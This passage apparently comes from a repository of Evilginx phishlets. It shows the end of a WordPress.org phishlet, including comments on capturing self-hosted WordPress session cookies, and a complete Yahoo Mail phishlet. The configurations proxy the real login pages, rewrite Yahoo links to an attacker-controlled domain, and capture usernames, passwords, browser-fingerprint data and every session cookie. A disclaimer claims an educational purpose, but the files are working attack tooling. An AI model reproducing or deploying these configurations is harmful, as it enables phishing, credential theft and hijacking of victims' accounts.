31 | domain: 'wordpress.org'
32 | session: true
33 | is_landing: false
34 | - phish_sub: 'profiles'
35 | orig_sub: 'profiles'
36 | domain: 'wordpress.org'
37 | session: true
38 | is_landing: false
39 |
40 | sub_filters: []
41 |
42 | # For self-hosted WordPress sites, you may find it easier to use a
43 | # regular expression to match session cookies, as the cookie names
44 | # are produced unqiely per-site. This can be done as follows:
45 | #
46 | # ```yaml
47 | # - domain: 'self-hosted-domain.com'
48 | # keys:
49 | # - 'wordpress_sec_.*,regexp'
50 | # - 'wordpress_logged_in_.*,regexp'
51 | # ```
52 | #
53 | # If you do choose to use the regular expression facility, you
54 | # will also then need to use the `auth_urls` dictionary to define
55 | # when Evilginx should actually capture these tokens. Something
56 | # like this should do the trick:
57 | #
58 | # ```yaml
59 | # auth_urls:
60 | # - '.*/wp-admin/.*'
61 | # ```
62 | #
63 | # The above ensures that the `auth_tokens` are noticed whenever
64 | # the phished user makes requests to URLs containing `wp-admin`.
65 | #
66 | # For the WordPress.org service itself, however, none of the above is
67 | # necessary, and the following simple `auth_tokens` dictionary should
68 | # work just fine.
69 | auth_tokens:
70 | - domain: '.wordpress.org'
71 | keys: ['wporg_logged_in', 'wporg_sec']
72 |
73 | credentials:
74 | username:
75 | key: 'log'
76 | search: '(.*)'
77 | type: 'post'
78 | password:
79 | key: 'pwd'
80 | search: '(.*)'
81 | type: 'post'
82 |
83 | # For a self-hosted WordPress site, you'll probably want to define the
84 | # `login` dictionary here as follows:
85 | #
86 | # ```yaml
87 | # login:
88 | # domain: 'self-hosted-domain.com'
89 | # path: '/wp-login.php'
90 | # ```
91 | #
92 | # Some WordPress plugins, such as WooCommerce, change the URL of the
93 | # login page. You'll want to examine the specific site for this.
94 | login:
95 | domain: 'login.wordpress.org'
96 | path: '/'
97 |
--------------------------------------------------------------------------------
/phishlet_examples/yahoo(fixed).yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 |
5 | author: '@an0nud4y'
6 | min_ver: '2.3.0'
7 | proxy_hosts:
8 | - {phish_sub: '', orig_sub: '', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
9 | - {phish_sub: 'www', orig_sub: 'www', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
10 | - {phish_sub: 'mail', orig_sub: 'mail', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
11 | - {phish_sub: 'login', orig_sub: 'login', domain: 'yahoo.com', session: true, is_landing: true, auto_filter: false}
12 | - {phish_sub: 'guce', orig_sub: 'guce', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
13 | - {phish_sub: 'udc', orig_sub: 'udc', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
14 | - {phish_sub: 'fc', orig_sub: 'fc', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
15 | - {phish_sub: 'ads', orig_sub: 'ads', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
16 | - {phish_sub: 'csp', orig_sub: 'csp', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
17 | sub_filters:
18 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
19 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
20 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
21 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
22 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
23 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
24 | - {triggers_on: 'mail.yahoo.com', orig_sub: 'mail', domain: 'yahoo.com', search: 'csp.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
25 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
26 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
27 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
28 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
29 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
30 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
31 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
32 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
33 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
34 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
35 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
36 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
37 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
38 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
39 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
40 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
41 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
42 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
43 | auth_tokens:
44 | - domain: '.yahoo.com'
45 | keys: ['.*,regexp']
46 | - domain: 'mail.yahoo.com'
47 | keys: ['.*,regexp']
48 | - domain: 'login.yahoo.com'
49 | keys: ['.*,regexp']
50 | - domain: 'guce.yahoo.com'
51 | keys: ['.*,regexp']
52 | - domain: 'udc.yahoo.com'
53 | keys: ['.*,regexp']
54 | credentials:
55 | username:
56 | key: 'username'
57 | search: '(.*)'
58 | type: 'post'
59 | password:
60 | key: '^password$'
61 | search: '(.*)'
62 | type: 'post'
63 | custom:
64 | - key: 'browser-fp-data'
65 | search: '(.*)'
66 | type: 'post'
67 | auth_urls:
68 | - '/consent'
69 | - '/$'
70 | login:
71 | domain: 'login.yahoo.com'
72 | path: '/?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd'
73 |
74 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
75 | # PLEASE DO NOT MISUSE THIS PHISHLET.
76 |
77 |
--------------------------------------------------------------------------------